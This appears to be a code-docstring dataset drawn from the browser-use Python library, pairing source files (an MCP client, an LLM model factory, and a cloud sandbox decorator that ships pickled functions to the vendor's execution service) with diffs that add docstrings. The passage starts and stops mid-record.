parts.append(str(item))
return '\n'.join(parts)
else:
return str(result.content)
elif isinstance(result, list):
# List of content items
parts = []
for item in result:
if hasattr(item, 'text'):
parts.append(item.text)
else:
parts.append(str(item))
return '\n'.join(parts)
else:
# Direct result or unknown format
return str(result)
def _json_schema_to_python_type(self, schema: dict, model_name: str = 'NestedModel') -> Any:
json_type = schema.get('type', 'string')
# Basic type mapping
type_mapping = {
'string': str,
'number': float,
'integer': int,
'boolean': bool,
'array': list,
'null': type(None),
}
# Handle enums (they're still strings)
if 'enum' in schema:
return str
# Handle objects with nested properties
if json_type == 'object':
properties = schema.get('properties', {})
if properties:
# Create nested pydantic model for objects with properties
nested_fields = {}
required_fields = set(schema.get('required', []))
for prop_name, prop_schema in properties.items():
# Recursively process nested properties
prop_type = self._json_schema_to_python_type(prop_schema, f'{model_name}_{prop_name}')
# Determine if field is required and handle defaults
if prop_name in required_fields:
default = ... # Required field
else:
# Optional field - make type optional and handle default
prop_type = prop_type | None
if 'default' in prop_schema:
default = prop_schema['default']
else:
default = None
# Add field with description if available
field_kwargs = {}
if 'description' in prop_schema:
field_kwargs['description'] = prop_schema['description']
nested_fields[prop_name] = (prop_type, Field(default, **field_kwargs))
# Create a BaseModel class with proper configuration
class ConfiguredBaseModel(BaseModel):
model_config = ConfigDict(extra='forbid', validate_by_name=True, validate_by_alias=True)
try:
# Create and return nested pydantic model
return create_model(model_name, __base__=ConfiguredBaseModel, **nested_fields)
except Exception as e:
logger.error(f'Failed to create nested model {model_name}: {e}')
logger.debug(f'Fields: {nested_fields}')
# Fallback to basic dict if model creation fails
return dict
else:
# Object without properties - just return dict
return dict
# Handle arrays with specific item types
if json_type == 'array':
if 'items' in schema:
# Get the item type recursively
item_type = self._json_schema_to_python_type(schema['items'], f'{model_name}_item')
# Return properly typed list
return list[item_type]
else:
# Array without item type specification
return list
# Get base type for non-object types
base_type = type_mapping.get(json_type, str)
# Handle nullable/optional types
if schema.get('nullable', False) or json_type == 'null':
return base_type | None
return base_type
async def __aenter__(self):
await self.connect()
return self
async def __aexit__(self, exc_type, exc_val, exc_tb):
await self.disconnect() | --- +++ @@ -1,3 +1,26 @@+"""MCP (Model Context Protocol) client integration for browser-use.
+
+This module provides integration between external MCP servers and browser-use's action registry.
+MCP tools are dynamically discovered and registered as browser-use actions.
+
+Example usage:
+ from browser_use import Tools
+ from browser_use.mcp.client import MCPClient
+
+ tools = Tools()
+
+ # Connect to an MCP server
+ mcp_client = MCPClient(
+ server_name="my-server",
+ command="npx",
+ args=["@mycompany/mcp-server@latest"]
+ )
+
+ # Register all MCP tools as browser-use actions
+ await mcp_client.register_to_tools(tools)
+
+ # Now use with Agent as normal - MCP tools are available as actions
+"""
import asyncio
import logging
@@ -22,6 +45,7 @@
class MCPClient:
+ """Client for connecting to MCP servers and exposing their tools as browser-use actions."""
def __init__(
self,
@@ -30,6 +54,14 @@ args: list[str] | None = None,
env: dict[str, str] | None = None,
):
+ """Initialize MCP client.
+
+ Args:
+ server_name: Name of the MCP server (for logging and identification)
+ command: Command to start the MCP server (e.g., "npx", "python")
+ args: Arguments for the command (e.g., ["@playwright/mcp@latest"])
+ env: Environment variables for the server process
+ """
self.server_name = server_name
self.command = command
self.args = args or []
@@ -46,6 +78,7 @@ self._telemetry = ProductTelemetry()
async def connect(self) -> None:
+ """Connect to the MCP server and discover available tools."""
if self._connected:
logger.debug(f'Already connected to {self.server_name}')
return
@@ -96,6 +129,7 @@ )
async def _run_stdio_client(self, server_params: StdioServerParameters):
+ """Run the stdio client connection in a background task."""
try:
async with stdio_client(server_params) as (read_stream, write_stream):
self._read_stream = read_stream
@@ -127,6 +161,7 @@ self.session = None
async def disconnect(self) -> None:
+ """Disconnect from the MCP server."""
if not self._connected:
return
@@ -180,6 +215,13 @@ tool_filter: list[str] | None = None,
prefix: str | None = None,
) -> None:
+ """Register MCP tools as actions in the browser-use tools.
+
+ Args:
+ tools: Browser-use tools to register actions to
+ tool_filter: Optional list of tool names to register (None = all tools)
+ prefix: Optional prefix to add to action names (e.g., "playwright_")
+ """
if not self._connected:
await self.connect()
@@ -204,6 +246,13 @@ logger.info(f"✅ Registered {len(self._registered_actions)} MCP tools from '{self.server_name}' as browser-use actions")
def _register_tool_as_action(self, registry: Registry, action_name: str, tool: Any) -> None:
+ """Register a single MCP tool as a browser-use action.
+
+ Args:
+ registry: Browser-use registry to register action to
+ action_name: Name for the registered action
+ tool: MCP Tool object with schema information
+ """
# Parse tool parameters to create Pydantic model
param_fields = {}
@@ -258,6 +307,7 @@ if param_model:
# Type 1: Function takes param model as first parameter
async def mcp_action_wrapper(params: param_model) -> ActionResult: # type: ignore[no-redef]
+ """Wrapper function that calls the MCP tool."""
if not self.session or not self._connected:
return ActionResult(error=f"MCP server '{self.server_name}' not connected", success=False)
@@ -304,6 +354,7 @@ else:
# No parameters - empty function signature
async def mcp_action_wrapper() -> ActionResult: # type: ignore[no-redef]
+ """Wrapper function that calls the MCP tool."""
if not self.session or not self._connected:
return ActionResult(error=f"MCP server '{self.server_name}' not connected", success=False)
@@ -358,6 +409,14 @@ logger.debug(f"✅ Registered MCP tool '{tool.name}' as action '{action_name}'")
def _format_mcp_result(self, result: Any) -> str:
+ """Format MCP tool result into a string for ActionResult.
+
+ Args:
+ result: Raw result from MCP tool call
+
+ Returns:
+ Formatted string representation of the result
+ """
# Handle different MCP result formats
if hasattr(result, 'content'):
# Structured content response
@@ -388,6 +447,15 @@ return str(result)
def _json_schema_to_python_type(self, schema: dict, model_name: str = 'NestedModel') -> Any:
+ """Convert JSON Schema type to Python type.
+
+ Args:
+ schema: JSON Schema definition
+ model_name: Name for nested models
+
+ Returns:
+ Python type corresponding to the schema
+ """
json_type = schema.get('type', 'string')
# Basic type mapping
@@ -471,8 +539,10 @@ return base_type
async def __aenter__(self):
+ """Async context manager entry."""
await self.connect()
return self
async def __aexit__(self, exc_type, exc_val, exc_tb):
- await self.disconnect()+ """Async context manager exit."""
+ await self.disconnect()
| https://raw.githubusercontent.com/browser-use/browser-use/HEAD/browser_use/mcp/client.py |
Add structured docstrings to improve clarity |
import os
from typing import TYPE_CHECKING
from browser_use.llm.azure.chat import ChatAzureOpenAI
from browser_use.llm.browser_use.chat import ChatBrowserUse
from browser_use.llm.cerebras.chat import ChatCerebras
from browser_use.llm.google.chat import ChatGoogle
from browser_use.llm.mistral.chat import ChatMistral
from browser_use.llm.openai.chat import ChatOpenAI
# Optional OCI import
try:
from browser_use.llm.oci_raw.chat import ChatOCIRaw
OCI_AVAILABLE = True
except ImportError:
ChatOCIRaw = None
OCI_AVAILABLE = False
if TYPE_CHECKING:
from browser_use.llm.base import BaseChatModel
# Type stubs for IDE autocomplete
openai_gpt_4o: 'BaseChatModel'
openai_gpt_4o_mini: 'BaseChatModel'
openai_gpt_4_1_mini: 'BaseChatModel'
openai_o1: 'BaseChatModel'
openai_o1_mini: 'BaseChatModel'
openai_o1_pro: 'BaseChatModel'
openai_o3: 'BaseChatModel'
openai_o3_mini: 'BaseChatModel'
openai_o3_pro: 'BaseChatModel'
openai_o4_mini: 'BaseChatModel'
openai_gpt_5: 'BaseChatModel'
openai_gpt_5_mini: 'BaseChatModel'
openai_gpt_5_nano: 'BaseChatModel'
azure_gpt_4o: 'BaseChatModel'
azure_gpt_4o_mini: 'BaseChatModel'
azure_gpt_4_1_mini: 'BaseChatModel'
azure_o1: 'BaseChatModel'
azure_o1_mini: 'BaseChatModel'
azure_o1_pro: 'BaseChatModel'
azure_o3: 'BaseChatModel'
azure_o3_mini: 'BaseChatModel'
azure_o3_pro: 'BaseChatModel'
azure_gpt_5: 'BaseChatModel'
azure_gpt_5_mini: 'BaseChatModel'
google_gemini_2_0_flash: 'BaseChatModel'
google_gemini_2_0_pro: 'BaseChatModel'
google_gemini_2_5_pro: 'BaseChatModel'
google_gemini_2_5_flash: 'BaseChatModel'
google_gemini_2_5_flash_lite: 'BaseChatModel'
mistral_large: 'BaseChatModel'
mistral_medium: 'BaseChatModel'
mistral_small: 'BaseChatModel'
codestral: 'BaseChatModel'
pixtral_large: 'BaseChatModel'
cerebras_llama3_1_8b: 'BaseChatModel'
cerebras_llama3_3_70b: 'BaseChatModel'
cerebras_gpt_oss_120b: 'BaseChatModel'
cerebras_llama_4_scout_17b_16e_instruct: 'BaseChatModel'
cerebras_llama_4_maverick_17b_128e_instruct: 'BaseChatModel'
cerebras_qwen_3_32b: 'BaseChatModel'
cerebras_qwen_3_235b_a22b_instruct_2507: 'BaseChatModel'
cerebras_qwen_3_235b_a22b_thinking_2507: 'BaseChatModel'
cerebras_qwen_3_coder_480b: 'BaseChatModel'
bu_latest: 'BaseChatModel'
bu_1_0: 'BaseChatModel'
bu_2_0: 'BaseChatModel'
def get_llm_by_name(model_name: str):
if not model_name:
raise ValueError('Model name cannot be empty')
# Handle top-level Mistral aliases without provider prefix
mistral_aliases = {
'mistral_large': 'mistral-large-latest',
'mistral_medium': 'mistral-medium-latest',
'mistral_small': 'mistral-small-latest',
'codestral': 'codestral-latest',
'pixtral_large': 'pixtral-large-latest',
}
if model_name in mistral_aliases:
api_key = os.getenv('MISTRAL_API_KEY')
base_url = os.getenv('MISTRAL_BASE_URL', 'https://api.mistral.ai/v1')
return ChatMistral(model=mistral_aliases[model_name], api_key=api_key, base_url=base_url)
# Parse model name
parts = model_name.split('_', 1)
if len(parts) < 2:
raise ValueError(f"Invalid model name format: '{model_name}'. Expected format: 'provider_model_name'")
provider = parts[0]
model_part = parts[1]
# Convert underscores back to dots/dashes for actual model names
if 'gpt_4_1_mini' in model_part:
model = model_part.replace('gpt_4_1_mini', 'gpt-4.1-mini')
elif 'gpt_4o_mini' in model_part:
model = model_part.replace('gpt_4o_mini', 'gpt-4o-mini')
elif 'gpt_4o' in model_part:
model = model_part.replace('gpt_4o', 'gpt-4o')
elif 'gemini_2_0' in model_part:
model = model_part.replace('gemini_2_0', 'gemini-2.0').replace('_', '-')
elif 'gemini_2_5' in model_part:
model = model_part.replace('gemini_2_5', 'gemini-2.5').replace('_', '-')
elif 'llama3_1' in model_part:
model = model_part.replace('llama3_1', 'llama3.1').replace('_', '-')
elif 'llama3_3' in model_part:
model = model_part.replace('llama3_3', 'llama-3.3').replace('_', '-')
elif 'llama_4_scout' in model_part:
model = model_part.replace('llama_4_scout', 'llama-4-scout').replace('_', '-')
elif 'llama_4_maverick' in model_part:
model = model_part.replace('llama_4_maverick', 'llama-4-maverick').replace('_', '-')
elif 'gpt_oss_120b' in model_part:
model = model_part.replace('gpt_oss_120b', 'gpt-oss-120b')
elif 'qwen_3_32b' in model_part:
model = model_part.replace('qwen_3_32b', 'qwen-3-32b')
elif 'qwen_3_235b_a22b_instruct' in model_part:
if model_part.endswith('_2507'):
model = model_part.replace('qwen_3_235b_a22b_instruct_2507', 'qwen-3-235b-a22b-instruct-2507')
else:
model = model_part.replace('qwen_3_235b_a22b_instruct', 'qwen-3-235b-a22b-instruct-2507')
elif 'qwen_3_235b_a22b_thinking' in model_part:
if model_part.endswith('_2507'):
model = model_part.replace('qwen_3_235b_a22b_thinking_2507', 'qwen-3-235b-a22b-thinking-2507')
else:
model = model_part.replace('qwen_3_235b_a22b_thinking', 'qwen-3-235b-a22b-thinking-2507')
elif 'qwen_3_coder_480b' in model_part:
model = model_part.replace('qwen_3_coder_480b', 'qwen-3-coder-480b')
else:
model = model_part.replace('_', '-')
# OpenAI Models
if provider == 'openai':
api_key = os.getenv('OPENAI_API_KEY')
return ChatOpenAI(model=model, api_key=api_key)
# Azure OpenAI Models
elif provider == 'azure':
api_key = os.getenv('AZURE_OPENAI_KEY') or os.getenv('AZURE_OPENAI_API_KEY')
azure_endpoint = os.getenv('AZURE_OPENAI_ENDPOINT')
return ChatAzureOpenAI(model=model, api_key=api_key, azure_endpoint=azure_endpoint)
# Google Models
elif provider == 'google':
api_key = os.getenv('GOOGLE_API_KEY')
return ChatGoogle(model=model, api_key=api_key)
# Mistral Models
elif provider == 'mistral':
api_key = os.getenv('MISTRAL_API_KEY')
base_url = os.getenv('MISTRAL_BASE_URL', 'https://api.mistral.ai/v1')
mistral_map = {
'large': 'mistral-large-latest',
'medium': 'mistral-medium-latest',
'small': 'mistral-small-latest',
'codestral': 'codestral-latest',
'pixtral-large': 'pixtral-large-latest',
}
normalized_model_part = model_part.replace('_', '-')
resolved_model = mistral_map.get(normalized_model_part, model.replace('_', '-'))
return ChatMistral(model=resolved_model, api_key=api_key, base_url=base_url)
# OCI Models
elif provider == 'oci':
# OCI requires more complex configuration that can't be easily inferred from env vars
# Users should use ChatOCIRaw directly with proper configuration
raise ValueError('OCI models require manual configuration. Use ChatOCIRaw directly with your OCI credentials.')
# Cerebras Models
elif provider == 'cerebras':
api_key = os.getenv('CEREBRAS_API_KEY')
return ChatCerebras(model=model, api_key=api_key)
# Browser Use Models
elif provider == 'bu':
# Handle bu_latest -> bu-latest conversion (need to prepend 'bu-' back)
model = f'bu-{model_part.replace("_", "-")}'
api_key = os.getenv('BROWSER_USE_API_KEY')
return ChatBrowserUse(model=model, api_key=api_key)
else:
available_providers = ['openai', 'azure', 'google', 'oci', 'cerebras', 'bu']
raise ValueError(f"Unknown provider: '{provider}'. Available providers: {', '.join(available_providers)}")
# Pre-configured model instances (lazy loaded via __getattr__)
def __getattr__(name: str) -> 'BaseChatModel':
# Handle chat classes first
if name == 'ChatOpenAI':
return ChatOpenAI # type: ignore
elif name == 'ChatAzureOpenAI':
return ChatAzureOpenAI # type: ignore
elif name == 'ChatGoogle':
return ChatGoogle # type: ignore
elif name == 'ChatMistral':
return ChatMistral # type: ignore
elif name == 'ChatOCIRaw':
if not OCI_AVAILABLE:
raise ImportError('OCI integration not available. Install with: pip install "browser-use[oci]"')
return ChatOCIRaw # type: ignore
elif name == 'ChatCerebras':
return ChatCerebras # type: ignore
elif name == 'ChatBrowserUse':
return ChatBrowserUse # type: ignore
# Handle model instances - these are the main use case
try:
return get_llm_by_name(name)
except ValueError:
raise AttributeError(f"module '{__name__}' has no attribute '{name}'")
# Export all classes and preconfigured instances, conditionally including ChatOCIRaw
__all__ = [
'ChatOpenAI',
'ChatAzureOpenAI',
'ChatGoogle',
'ChatMistral',
'ChatCerebras',
'ChatBrowserUse',
]
if OCI_AVAILABLE:
__all__.append('ChatOCIRaw')
__all__ += [
'get_llm_by_name',
# OpenAI instances - created on demand
'openai_gpt_4o',
'openai_gpt_4o_mini',
'openai_gpt_4_1_mini',
'openai_o1',
'openai_o1_mini',
'openai_o1_pro',
'openai_o3',
'openai_o3_mini',
'openai_o3_pro',
'openai_o4_mini',
'openai_gpt_5',
'openai_gpt_5_mini',
'openai_gpt_5_nano',
# Azure instances - created on demand
'azure_gpt_4o',
'azure_gpt_4o_mini',
'azure_gpt_4_1_mini',
'azure_o1',
'azure_o1_mini',
'azure_o1_pro',
'azure_o3',
'azure_o3_mini',
'azure_o3_pro',
'azure_gpt_5',
'azure_gpt_5_mini',
# Google instances - created on demand
'google_gemini_2_0_flash',
'google_gemini_2_0_pro',
'google_gemini_2_5_pro',
'google_gemini_2_5_flash',
'google_gemini_2_5_flash_lite',
# Mistral instances - created on demand
'mistral_large',
'mistral_medium',
'mistral_small',
'codestral',
'pixtral_large',
# Cerebras instances - created on demand
'cerebras_llama3_1_8b',
'cerebras_llama3_3_70b',
'cerebras_gpt_oss_120b',
'cerebras_llama_4_scout_17b_16e_instruct',
'cerebras_llama_4_maverick_17b_128e_instruct',
'cerebras_qwen_3_32b',
'cerebras_qwen_3_235b_a22b_instruct_2507',
'cerebras_qwen_3_235b_a22b_thinking_2507',
'cerebras_qwen_3_coder_480b',
# Browser Use instances - created on demand
'bu_latest',
'bu_1_0',
'bu_2_0',
]
# NOTE: OCI backend is optional. The try/except ImportError and conditional __all__ are required
# so this module can be imported without browser-use[oci] installed. | --- +++ @@ -1,3 +1,15 @@+"""
+Convenient access to LLM models.
+
+Usage:
+ from browser_use import llm
+
+ # Simple model access
+ model = llm.azure_gpt_4_1_mini
+ model = llm.openai_gpt_4o
+ model = llm.google_gemini_2_5_pro
+ model = llm.bu_latest # or bu_1_0, bu_2_0
+"""
import os
from typing import TYPE_CHECKING
@@ -75,6 +87,18 @@
def get_llm_by_name(model_name: str):
+ """
+ Factory function to create LLM instances from string names with API keys from environment.
+
+ Args:
+ model_name: String name like 'azure_gpt_4_1_mini', 'openai_gpt_4o', etc.
+
+ Returns:
+ LLM instance with API keys from environment variables
+
+ Raises:
+ ValueError: If model_name is not recognized
+ """
if not model_name:
raise ValueError('Model name cannot be empty')
@@ -194,6 +218,7 @@
# Pre-configured model instances (lazy loaded via __getattr__)
def __getattr__(name: str) -> 'BaseChatModel':
+ """Create model instances on demand with API keys from environment."""
# Handle chat classes first
if name == 'ChatOpenAI':
return ChatOpenAI # type: ignore
@@ -291,4 +316,4 @@ ]
# NOTE: OCI backend is optional. The try/except ImportError and conditional __all__ are required
-# so this module can be imported without browser-use[oci] installed.+# so this module can be imported without browser-use[oci] installed.
| https://raw.githubusercontent.com/browser-use/browser-use/HEAD/browser_use/llm/models.py |
Provide clean and structured docstrings | import ast
import asyncio
import base64
import dataclasses
import enum
import inspect
import json
import os
import sys
import textwrap
from collections.abc import Callable, Coroutine
from functools import wraps
from typing import TYPE_CHECKING, Any, Concatenate, ParamSpec, TypeVar, Union, cast, get_args, get_origin
import cloudpickle
import httpx
from browser_use.sandbox.views import (
BrowserCreatedData,
ErrorData,
LogData,
ResultData,
SandboxError,
SSEEvent,
SSEEventType,
)
if TYPE_CHECKING:
from browser_use.browser import BrowserSession
T = TypeVar('T')
P = ParamSpec('P')
def get_terminal_width() -> int:
try:
return os.get_terminal_size().columns
except (AttributeError, OSError):
return 80
async def _call_callback(callback: Callable[..., Any], *args: Any) -> None:
result = callback(*args)
if asyncio.iscoroutine(result):
await result
def _get_function_source_without_decorator(func: Callable) -> str:
source = inspect.getsource(func)
source = textwrap.dedent(source)
# Parse and remove decorator
tree = ast.parse(source)
for node in ast.walk(tree):
if isinstance(node, (ast.FunctionDef, ast.AsyncFunctionDef)):
node.decorator_list = []
break
return ast.unparse(tree)
def _get_imports_used_in_function(func: Callable) -> str:
# Get all names referenced in the function
code = func.__code__
referenced_names = set(code.co_names)
# Also get names from type annotations (recursively for complex types like Union, Literal, etc.)
def extract_type_names(annotation):
if annotation is None or annotation == inspect.Parameter.empty:
return
# Handle Pydantic generics (e.g., AgentHistoryList[MyModel]) - check this FIRST
# Pydantic generics have __pydantic_generic_metadata__ with 'origin' and 'args'
pydantic_meta = getattr(annotation, '__pydantic_generic_metadata__', None)
if pydantic_meta and pydantic_meta.get('origin'):
# Add the origin class name (e.g., 'AgentHistoryList')
origin_class = pydantic_meta['origin']
if hasattr(origin_class, '__name__'):
referenced_names.add(origin_class.__name__)
# Recursively extract from generic args (e.g., MyModel)
for arg in pydantic_meta.get('args', ()):
extract_type_names(arg)
return
# Handle simple types with __name__
if hasattr(annotation, '__name__'):
referenced_names.add(annotation.__name__)
# Handle string annotations
if isinstance(annotation, str):
referenced_names.add(annotation)
# Handle generic types like Union[X, Y], Literal['x'], etc.
origin = get_origin(annotation)
args = get_args(annotation)
if origin:
# Add the origin type name (e.g., 'Union', 'Literal')
if hasattr(origin, '__name__'):
referenced_names.add(origin.__name__)
# Recursively extract from generic args
if args:
for arg in args:
extract_type_names(arg)
sig = inspect.signature(func)
for param in sig.parameters.values():
if param.annotation != inspect.Parameter.empty:
extract_type_names(param.annotation)
# Get return annotation (also extract recursively)
if 'return' in func.__annotations__:
extract_type_names(func.__annotations__['return'])
# Get the module where function is defined
module = inspect.getmodule(func)
if not module or not hasattr(module, '__file__') or module.__file__ is None:
return ''
try:
with open(module.__file__) as f:
module_source = f.read()
tree = ast.parse(module_source)
needed_imports: list[str] = []
for node in tree.body:
if isinstance(node, ast.Import):
# import X, Y
for alias in node.names:
import_name = alias.asname if alias.asname else alias.name
if import_name in referenced_names:
needed_imports.append(ast.unparse(node))
break
elif isinstance(node, ast.ImportFrom):
# from X import Y, Z
imported_names = []
for alias in node.names:
import_name = alias.asname if alias.asname else alias.name
if import_name in referenced_names:
imported_names.append(alias)
if imported_names:
# Create filtered import statement
filtered_import = ast.ImportFrom(module=node.module, names=imported_names, level=node.level)
needed_imports.append(ast.unparse(filtered_import))
return '\n'.join(needed_imports)
except Exception:
return ''
def _extract_all_params(func: Callable, args: tuple, kwargs: dict) -> dict[str, Any]:
sig = inspect.signature(func)
bound_args = sig.bind_partial(*args, **kwargs)
bound_args.apply_defaults()
all_params: dict[str, Any] = {}
# 1. Extract explicit parameters (skip 'browser' and 'self')
for param_name, param_value in bound_args.arguments.items():
if param_name == 'browser':
continue
if param_name == 'self' and hasattr(param_value, '__dict__'):
# Extract self attributes as individual variables
for attr_name, attr_value in param_value.__dict__.items():
all_params[attr_name] = attr_value
else:
all_params[param_name] = param_value
# 2. Extract closure variables
if func.__closure__:
closure_vars = func.__code__.co_freevars
closure_values = [cell.cell_contents for cell in func.__closure__]
for name, value in zip(closure_vars, closure_values):
# Skip if already captured from explicit params
if name in all_params:
continue
# Special handling for 'self' in closures
if name == 'self' and hasattr(value, '__dict__'):
for attr_name, attr_value in value.__dict__.items():
if attr_name not in all_params:
all_params[attr_name] = attr_value
else:
all_params[name] = value
# 3. Extract referenced globals (like logger, module-level vars, etc.)
# Let cloudpickle handle serialization instead of special-casing
for name in func.__code__.co_names:
if name in all_params:
continue
if name in func.__globals__:
all_params[name] = func.__globals__[name]
return all_params
def sandbox(
BROWSER_USE_API_KEY: str | None = None,
cloud_profile_id: str | None = None,
cloud_proxy_country_code: str | None = None,
cloud_timeout: int | None = None,
server_url: str | None = None,
log_level: str = 'INFO',
quiet: bool = False,
headers: dict[str, str] | None = None,
on_browser_created: Callable[[BrowserCreatedData], None]
| Callable[[BrowserCreatedData], Coroutine[Any, Any, None]]
| None = None,
on_instance_ready: Callable[[], None] | Callable[[], Coroutine[Any, Any, None]] | None = None,
on_log: Callable[[LogData], None] | Callable[[LogData], Coroutine[Any, Any, None]] | None = None,
on_result: Callable[[ResultData], None] | Callable[[ResultData], Coroutine[Any, Any, None]] | None = None,
on_error: Callable[[ErrorData], None] | Callable[[ErrorData], Coroutine[Any, Any, None]] | None = None,
**env_vars: str,
) -> Callable[[Callable[Concatenate['BrowserSession', P], Coroutine[Any, Any, T]]], Callable[P, Coroutine[Any, Any, T]]]:
def decorator(
func: Callable[Concatenate['BrowserSession', P], Coroutine[Any, Any, T]],
) -> Callable[P, Coroutine[Any, Any, T]]:
# Validate function has browser parameter
sig = inspect.signature(func)
if 'browser' not in sig.parameters:
raise TypeError(f'{func.__name__}() must have a "browser" parameter')
browser_param = sig.parameters['browser']
if browser_param.annotation != inspect.Parameter.empty:
annotation_str = str(browser_param.annotation)
if 'Browser' not in annotation_str:
raise TypeError(f'{func.__name__}() browser parameter must be typed as Browser, got {annotation_str}')
@wraps(func)
async def wrapper(*args, **kwargs) -> T:
# 1. Get API key
api_key = BROWSER_USE_API_KEY or os.getenv('BROWSER_USE_API_KEY')
if not api_key:
raise SandboxError('BROWSER_USE_API_KEY is required')
# 2. Extract all parameters (explicit + closure)
all_params = _extract_all_params(func, args, kwargs)
# 3. Get function source without decorator and only needed imports
func_source = _get_function_source_without_decorator(func)
needed_imports = _get_imports_used_in_function(func)
# Always include Browser import since it's required for the function signature
if needed_imports:
needed_imports = 'from browser_use import Browser\n' + needed_imports
else:
needed_imports = 'from browser_use import Browser'
# 4. Pickle parameters using cloudpickle for robust serialization
pickled_params = base64.b64encode(cloudpickle.dumps(all_params)).decode()
# 5. Determine which params are in the function signature vs closure/globals
func_param_names = {p.name for p in sig.parameters.values() if p.name != 'browser'}
non_explicit_params = {k: v for k, v in all_params.items() if k not in func_param_names}
explicit_params = {k: v for k, v in all_params.items() if k in func_param_names}
# Inject closure variables and globals as module-level vars
var_injections = []
for var_name in non_explicit_params.keys():
var_injections.append(f"{var_name} = _params['{var_name}']")
var_injection_code = '\n'.join(var_injections) if var_injections else '# No closure variables or globals'
# Build function call
if explicit_params:
function_call = (
f'await {func.__name__}(browser=browser, **{{k: _params[k] for k in {list(explicit_params.keys())!r}}})'
)
else:
function_call = f'await {func.__name__}(browser=browser)'
# 6. Create wrapper code that unpickles params and calls function
execution_code = f"""import cloudpickle
import base64
# Imports used in function
{needed_imports}
# Unpickle all parameters (explicit, closure, and globals)
_pickled_params = base64.b64decode({repr(pickled_params)})
_params = cloudpickle.loads(_pickled_params)
# Inject closure variables and globals into module scope
{var_injection_code}
# Original function (decorator removed)
{func_source}
# Wrapper function that passes explicit params
async def run(browser):
return {function_call}
"""
# 9. Send to server
payload: dict[str, Any] = {'code': base64.b64encode(execution_code.encode()).decode()}
combined_env: dict[str, str] = env_vars.copy() if env_vars else {}
combined_env['LOG_LEVEL'] = log_level.upper()
payload['env'] = combined_env
# Add cloud parameters if provided
if cloud_profile_id is not None:
payload['cloud_profile_id'] = cloud_profile_id
if cloud_proxy_country_code is not None:
payload['cloud_proxy_country_code'] = cloud_proxy_country_code
if cloud_timeout is not None:
payload['cloud_timeout'] = cloud_timeout
url = server_url or 'https://sandbox.api.browser-use.com/sandbox-stream'
request_headers = {'X-API-Key': api_key}
if headers:
request_headers.update(headers)
# 10. Handle SSE streaming
_NO_RESULT = object()
execution_result = _NO_RESULT
live_url_shown = False
execution_started = False
received_final_event = False
async with httpx.AsyncClient(timeout=1800.0) as client:
async with client.stream('POST', url, json=payload, headers=request_headers) as response:
response.raise_for_status()
try:
async for line in response.aiter_lines():
if not line or not line.startswith('data: '):
continue
event_json = line[6:]
try:
event = SSEEvent.from_json(event_json)
if event.type == SSEEventType.BROWSER_CREATED:
assert isinstance(event.data, BrowserCreatedData)
if on_browser_created:
try:
await _call_callback(on_browser_created, event.data)
except Exception as e:
if not quiet:
print(f'⚠️ Error in on_browser_created callback: {e}')
if not quiet and event.data.live_url and not live_url_shown:
width = get_terminal_width()
print('\n' + '━' * width)
print('👁️ LIVE BROWSER VIEW (Click to watch)')
print(f'🔗 {event.data.live_url}')
print('━' * width)
live_url_shown = True
elif event.type == SSEEventType.LOG:
assert isinstance(event.data, LogData)
message = event.data.message
level = event.data.level
if on_log:
try:
await _call_callback(on_log, event.data)
except Exception as e:
if not quiet:
print(f'⚠️ Error in on_log callback: {e}')
if level == 'stdout':
if not quiet:
if not execution_started:
width = get_terminal_width()
print('\n' + '─' * width)
print('⚡ Runtime Output')
print('─' * width)
execution_started = True
print(f' {message}', end='')
elif level == 'stderr':
if not quiet:
if not execution_started:
width = get_terminal_width()
print('\n' + '─' * width)
print('⚡ Runtime Output')
print('─' * width)
execution_started = True
print(f'⚠️ {message}', end='', file=sys.stderr)
elif level == 'info':
if not quiet:
if 'credit' in message.lower():
import re
match = re.search(r'\$[\d,]+\.?\d*', message)
if match:
print(f'💰 You have {match.group()} credits')
else:
print(f'ℹ️ {message}')
else:
if not quiet:
print(f' {message}')
elif event.type == SSEEventType.INSTANCE_READY:
if on_instance_ready:
try:
await _call_callback(on_instance_ready)
except Exception as e:
if not quiet:
print(f'⚠️ Error in on_instance_ready callback: {e}')
if not quiet:
print('✅ Browser ready, starting execution...\n')
elif event.type == SSEEventType.RESULT:
assert isinstance(event.data, ResultData)
exec_response = event.data.execution_response
received_final_event = True
if on_result:
try:
await _call_callback(on_result, event.data)
except Exception as e:
if not quiet:
print(f'⚠️ Error in on_result callback: {e}')
if exec_response.success:
execution_result = exec_response.result
if not quiet and execution_started:
width = get_terminal_width()
print('\n' + '─' * width)
print()
else:
error_msg = exec_response.error or 'Unknown error'
raise SandboxError(f'Execution failed: {error_msg}')
elif event.type == SSEEventType.ERROR:
assert isinstance(event.data, ErrorData)
received_final_event = True
if on_error:
try:
await _call_callback(on_error, event.data)
except Exception as e:
if not quiet:
print(f'⚠️ Error in on_error callback: {e}')
raise SandboxError(f'Execution failed: {event.data.error}')
except (json.JSONDecodeError, ValueError):
continue
except (httpx.RemoteProtocolError, httpx.ReadError, httpx.StreamClosed) as e:
# With deterministic handshake, these should never happen
# If they do, it's a real error
raise SandboxError(
f'Stream error: {e.__class__.__name__}: {e or "connection closed unexpectedly"}'
) from e
# 11. Parse result with type annotation
if execution_result is not _NO_RESULT:
return_annotation = func.__annotations__.get('return')
if return_annotation:
parsed_result = _parse_with_type_annotation(execution_result, return_annotation)
return parsed_result
return execution_result # type: ignore[return-value]
raise SandboxError('No result received from execution')
# Update wrapper signature to remove browser parameter
wrapper.__annotations__ = func.__annotations__.copy()
if 'browser' in wrapper.__annotations__:
del wrapper.__annotations__['browser']
params = [p for p in sig.parameters.values() if p.name != 'browser']
wrapper.__signature__ = sig.replace(parameters=params) # type: ignore[attr-defined]
return cast(Callable[P, Coroutine[Any, Any, T]], wrapper)
return decorator
def _parse_with_type_annotation(data: Any, annotation: Any) -> Any:
try:
if data is None:
return None
origin = get_origin(annotation)
args = get_args(annotation)
# Handle Union types
if origin is Union or (hasattr(annotation, '__class__') and annotation.__class__.__name__ == 'UnionType'):
union_args = args or getattr(annotation, '__args__', [])
for arg in union_args:
if arg is type(None) and data is None:
return None
if arg is not type(None):
try:
return _parse_with_type_annotation(data, arg)
except Exception:
continue
return data
# Handle List types
if origin is list:
if not isinstance(data, list):
return data
if args:
return [_parse_with_type_annotation(item, args[0]) for item in data]
return data
# Handle Tuple types (JSON serializes tuples as lists)
if origin is tuple:
if not isinstance(data, (list, tuple)):
return data
if args:
# Parse each element according to its type annotation
parsed_items = []
for i, item in enumerate(data):
# Use the corresponding type arg, or the last one if fewer args than items
type_arg = args[i] if i < len(args) else args[-1] if args else Any
parsed_items.append(_parse_with_type_annotation(item, type_arg))
return tuple(parsed_items)
return tuple(data) if isinstance(data, list) else data
